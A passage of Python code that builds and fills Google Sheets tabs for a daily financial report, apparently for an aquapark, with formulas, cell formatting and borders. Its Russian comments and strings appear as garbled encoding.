"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ss.runPrepared()
self.sheet2_line += 1
dateline += timedelta(1)
# ะะขะะะ
ss.prepare_setValues(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
"ะะขะะะ",
"",
f"=SUM(C3:C{self.sheet2_line - 1})",
f"=SUM(D3:D{self.sheet2_line - 1})",
f"=SUM(E3:E{self.sheet2_line - 1})",
f"=SUM(F3:F{self.sheet2_line - 1})",
f"=IFERROR(E{self.sheet2_line}/C{self.sheet2_line};0)",
f"=IFERROR(F{self.sheet2_line}/D{self.sheet2_line};0)",
f"=SUM(I3:I{self.sheet2_line - 1})",
f"=SUM(J3:J{self.sheet2_line - 1})",
f"=IFERROR(J{self.sheet2_line}/I{self.sheet2_line};0)",
f"=SUM(L3:L{self.sheet2_line - 1})",
f"=SUM(M3:M{self.sheet2_line - 1})",
f"=IFERROR(M{self.sheet2_line}/L{self.sheet2_line};0)",
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.sheet2_line}:N{self.sheet2_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{self.sheet2_line}:N{self.sheet2_line}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet3_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 4
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 4 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 3
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnWidth(0, 300)
ss.prepare_setColumnsWidth(1, 2, 160)
ss.prepare_setValues("A1:C1", [[
'=JOIN(" ";"ะัะพะณะพะฒัะน ะพััะตั ะฑัะดะตั ััะพัะผะธัะพะฒะฐะฝ ัะตัะตะท";DATEDIF(TODAY();DATE(YEAR(TODAY());'
'MONTH(TODAY())+1;1)-1;"D");IF(MOD(DATEDIF(TODAY();DATE(YEAR(TODAY());MONTH(TODAY())+1;1)-1;'
'"D");10)<5;"ะดะฝั";"ะดะฝะตะน"))', "", ""
], ], "ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
ss.prepare_setCellsFormats(
f"A1:C1",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:C1", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
i = 0
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 5
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 5 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 4
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnWidth(0, 300)
ss.prepare_setColumnsWidth(1, 2, 160)
ss.prepare_setValues("A1:C1", [[
'=JOIN(" ";"ะัะพะณะพะฒัะน ะพััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะฑัะดะตั ััะพัะผะธัะพะฒะฐะฝ ัะตัะตะท";DATEDIF(TODAY();DATE(YEAR(TODAY());'
'MONTH(TODAY())+1;1)-1;"D");IF(MOD(DATEDIF(TODAY();DATE(YEAR(TODAY());MONTH(TODAY())+1;1)-1;'
'"D");10)<5;"ะดะฝั";"ะดะฝะตะน"))', "", ""
], ], "ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
ss.prepare_setCellsFormats(
f"A1:C1",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:C1", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
i = 0
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 6
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 6 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 5
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 1, 105)
ss.prepare_setColumnsWidth(2, 5, 120)
ss.prepare_setColumnWidth(6, 100)
ss.prepare_setColumnWidth(7, 65)
ss.prepare_setColumnWidth(8, 120)
ss.prepare_setColumnWidth(9, 100)
ss.prepare_setColumnWidth(10, 65)
ss.prepare_setColumnWidth(11, 120)
ss.prepare_setColumnWidth(12, 100)
ss.prepare_setColumnWidth(13, 65)
ss.prepare_setColumnWidth(14, 120)
ss.prepare_setColumnWidth(15, 100)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:A2")
ss.prepare_mergeCells("B1:B2")
ss.prepare_mergeCells("C1:C2")
ss.prepare_mergeCells("D1:D2")
ss.prepare_mergeCells("E1:E2")
ss.prepare_mergeCells("F1:F2")
ss.prepare_mergeCells("G1:G2")
ss.prepare_mergeCells("H1:J1")
ss.prepare_mergeCells("K1:M1")
ss.prepare_mergeCells("N1:P1")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:P2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues("A1:P2", [
[
"ะะฐัะฐ", "ะะตะฝั ะฝะตะดะตะปะธ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ\n ะะะะ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ\n ะคะะะข", "ะะฑัะฐั ััะผะผะฐ\n ะะะะ",
"ะะฑัะฐั ััะผะผะฐ\n ะคะะะข", "ะะตะฟะพะทะธั", "ะะฐััั", "", "", "ะฃัะปัะณะธ", "", "", "ะขะพะฒะฐัั", "", "",
],
[
"", "", "", "", "", "", "", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
]
],
"ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:P2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet6_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
self.google_doc = (self.date_from.strftime('%Y-%m'), self.spreadsheet['spreadsheetId'])
self.google_links[self.google_doc[0]] = [self.google_doc[1], self.doc_version]
links = []
for docid in self.google_links:
links.append([docid, self.google_links[docid][0], self.google_links[docid][1]])
with open(self.list_google_docs, 'w', newline='', encoding='utf-8') as f:
file = csv.writer(f, delimiter=';')
for link in links:
file.writerow(link)
logging.info(
f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะทะดะฐะฝะฐ ะฝะพะฒะฐั ัะฐะฑะปะธัะฐ ั Id: {self.spreadsheet["spreadsheetId"]}')
self.spreadsheet = self.googleservice.spreadsheets().get(spreadsheetId=self.google_doc[1], ranges=[],
includeGridData=True).execute()
# -------------------------------- ะะะะะะะะะะ ะะะะะซะะ ------------------------------------------------
# ะะตัะฐัั ัะฐะฑะปะธัั ะฒ ะบะพะฝัะพะปั
# s = ''
# for line_table in spreadsheet['sheets'][0]['data'][0]['rowData']:
# for cell in line_table['values']:
# try:
# s += cell['formattedValue'] + " | "
# except KeyError:
# pass
# s = ''
# ะัะพะฒะตัะบะฐ ะฝะตั ะปะธ ัะตะบััะตะน ะดะฐัั ะฒ ัะฐะฑะปะธัะต
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะัะพะฒะตัะบะฐ ะฝะตั ะปะธ ัะตะบััะตะน ะดะฐัั ะฒ ัะฐะฑะปะธัะต...')
self.start_line = 1
self.reprint = 2
for line_table in self.spreadsheet['sheets'][0]['data'][0]['rowData']:
try:
if line_table['values'][0]['formattedValue'] == datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0],
'%d.%m.%Y'):
if self.root.ids.report.ids.split_by_days.active:
self.rewrite_google_sheet()
else:
self.show_dialog_variant(f'ะะตัะตะทะฐะฟะธัะฐัั ััั ัััะพะบั?',
f'ะกััะพะบะฐ ะทะฐ '
f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%d.%m.%Y")} '
f'ัะถะต ัััะตััะฒัะตั ะฒ ัะฐะฑะปะธัะต!',
self.rewrite_google_sheet,
)
self.reprint = 0
break
elif line_table['values'][0]['formattedValue'] == "ะะขะะะ":
break
else:
self.start_line += 1
except KeyError:
self.start_line += 1
if self.reprint:
self.write_google_sheet()
# width_table = len(self.spreadsheet['sheets'][0]['data'][0]['rowData'][0]['values'])
return True
def rewrite_google_sheet(self):
"""
ะะฐะฟะพะปะฝะตะฝะธะต google-ัะฐะฑะปะธัั ะฒ ัะปััะฐะต, ะตัะปะธ ะดะฐะฝะฝัะต ัะถะต ัััะตััะฒััั
"""
logging.warning(f'{__name__}: {str(datetime.now())[:-7]}: ะะตัะตะทะฐะฟะธัั ัะถะต ัััะตััะฒัััะตะน ัััะพะบะธ...')
self.reprint = 1
self.write_google_sheet()
def write_google_sheet(self):
"""
ะะฐะฟะพะปะฝะตะฝะธะต google-ัะฐะฑะปะธัั
"""
# SHEET 1
# try:
# while True:
# time_of = (datetime.now() - self.google_kwote_timer).seconds
# if time_of < 100:
# logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
# f'ะัะตะฒััะตะฝะพ ะบะพะปะธัะตััะฒะพ ะทะฐะฟัะพัะพะฒ ะฒ API GoogleSheets. \n'
# f'ะัะพะณัะฐะผะผะฐ ะฟัะพะดะพะปะถะธั ะฒัะฟะพะปะฝะตะฝะธะต ัะตัะตะท {100-time_of} ัะตะบ...')
# time.sleep(5)
# else:
# break
# except AttributeError:
# pass
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 1...')
sheetId = 0
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
# ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ั ะดะฐะฝะฝัะผะธ
weekday_rus = [
"ะะพะฝะตะดะตะปัะฝะธะบ",
"ะัะพัะฝะธะบ",
"ะกัะตะดะฐ",
"ะงะตัะฒะตัะณ",
"ะััะฝะธัะฐ",
"ะกัะฑะฑะพัะฐ",
"ะะพัะบัะตัะตะฝัะต",
]
self.nex_line = self.start_line
control_total_sum = sum([
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][1],
self.finreport_dict['ะะฑัะตะฟะธั'][1],
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][1],
self.finreport_dict['ะัะพัะตะต'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][1],
self.finreport_dict['ะะธะปะตัั ะ ะะ'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะ ะะ'][1],
self.finreport_dict['ะกะพะฟััััะฒัััะธะต ัะพะฒะฐัั'][1],
self.finreport_dict['ะะตะฟะพะทะธั'][1],
self.finreport_dict['ะจััะฐั'][1]
])
if self.finreport_dict['ะะขะะะ'][1] != control_total_sum:
logging.error(
f'{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะดะฐะฝะฝัั
: ะกัะผะผะฐ ััะปัะณ ะฝะต ัะฐะฒะฝะฐ ะธัะพะณะพะฒะพะน ััะผะผะต')
self.show_dialog(
'ะะตัะพะพัะฒะตัััะฒะธะต ะดะฐะฝะฝัั
',
f"ะกัะผะผะฐ ััะปัะณ ะฟะพ ะณััะฟะฟะฐะผ + ะดะตะฟะพะทะธั ({control_total_sum}) ะฝะต ัะฐะฒะฝะฐ ะธัะพะณะพะฒะพะน ััะผะผะต "
f"({self.finreport_dict['ะะขะะะ'][1]}). \n"
f"ะ ะตะบะพะผะตะฝะดัะตััั ะฟัะพะฒะตัะธัั ะฟัะฐะฒะธะปัะฝะพ ะปะธ ัะฐะทะดะตะปะตะฝั ััะปัะณะธ ะฟะพ ะณััะฟะฟะฐะผ."
)
ss.prepare_setValues(
f"A{self.nex_line}:AR{self.nex_line}",
[
[
datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%d.%m.%Y'),
weekday_rus[self.finreport_dict['ะะฐัะฐ'][0].weekday()],
f'=\'ะะปะฐะฝ\'!C{self.nex_line}',
f"{self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'][0]}",
f"{self.finreport_dict_lastyear['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'][0]}",
f'=\'ะะปะฐะฝ\'!E{self.nex_line}',
f"={str(self.finreport_dict['ะะขะะะ'][1]).replace('.', ',')}+"
f"AQ{self.nex_line}+AR{self.nex_line}+{str(self.finreport_dict['ะกะผะฐะนะป'][1]).replace('.', ',')}",
f"={str(self.finreport_dict_lastyear['ะะขะะะ'][1]).replace('.', ',')}+"
f"{str(self.finreport_dict_lastyear['Online ะัะพะดะฐะถะธ'][1]).replace('.', ',')}",
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][0],
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][1],
f"=IFERROR(J{self.nex_line}/I{self.nex_line};0)",
self.finreport_dict['ะะตะฟะพะทะธั'][1],
self.finreport_dict['ะจััะฐั'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][0],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][1],
f"=IFERROR(O{self.nex_line}/N{self.nex_line};0)",
f'=\'ะะปะฐะฝ\'!I{self.nex_line}',
f'=\'ะะปะฐะฝ\'!J{self.nex_line}',
f"=IFERROR(R{self.nex_line}/Q{self.nex_line};0)",
self.finreport_dict['ะะฑัะตะฟะธั'][0] + self.finreport_dict['ะกะผะฐะนะป'][0],
self.finreport_dict['ะะฑัะตะฟะธั'][1] + self.finreport_dict['ะกะผะฐะนะป'][1],
f"=IFERROR(U{self.nex_line}/T{self.nex_line};0)",
self.finreport_dict_lastyear['ะะฑัะตะฟะธั'][0] + self.finreport_dict_lastyear['ะกะผะฐะนะป'][0],
self.finreport_dict_lastyear['ะะฑัะตะฟะธั'][1] + self.finreport_dict_lastyear['ะกะผะฐะนะป'][1],
f"=IFERROR(X{self.nex_line}/W{self.nex_line};0)",
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][0],
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][1],
f"=IFERROR(AA{self.nex_line}/Z{self.nex_line};0)",
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][0],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][1],
f"=IFERROR(AD{self.nex_line}/AC{self.nex_line};0)",
self.finreport_dict['ะะธะปะตัั ะ ะะ'][0],
self.finreport_dict['ะะธะปะตัั ะ ะะ'][1],
f"=IFERROR(AG{self.nex_line}/AF{self.nex_line};0)",
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะ ะะ'][0],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะ ะะ'][1],
f"=IFERROR(AJ{self.nex_line}/AI{self.nex_line};0)",
self.finreport_dict['ะัะพัะตะต'][0] + self.finreport_dict['ะกะพะฟััััะฒัััะธะต ัะพะฒะฐัั'][0],
self.finreport_dict['ะัะพัะตะต'][1] + self.finreport_dict['ะกะพะฟััััะฒัััะธะต ัะพะฒะฐัั'][1],
self.finreport_dict['Online ะัะพะดะฐะถะธ'][0],
self.finreport_dict['Online ะัะพะดะฐะถะธ'][1],
f"=IFERROR(AO{self.nex_line}/AN{self.nex_line};0)",
0,
0,
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.nex_line}:AR{self.nex_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}, 'horizontalAlignment': 'LEFT'},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.nex_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.nex_line}:AR{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ------------------------------------------- ะะฐะฟะพะปะฝะตะฝะธะต ะะขะะะ --------------------------------------
# ะััะธัะปะตะฝะธะต ะฟะพัะปะตะดะฝะตะน ัััะพะบะธ ะฒ ัะฐะฑะปะธัะต
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
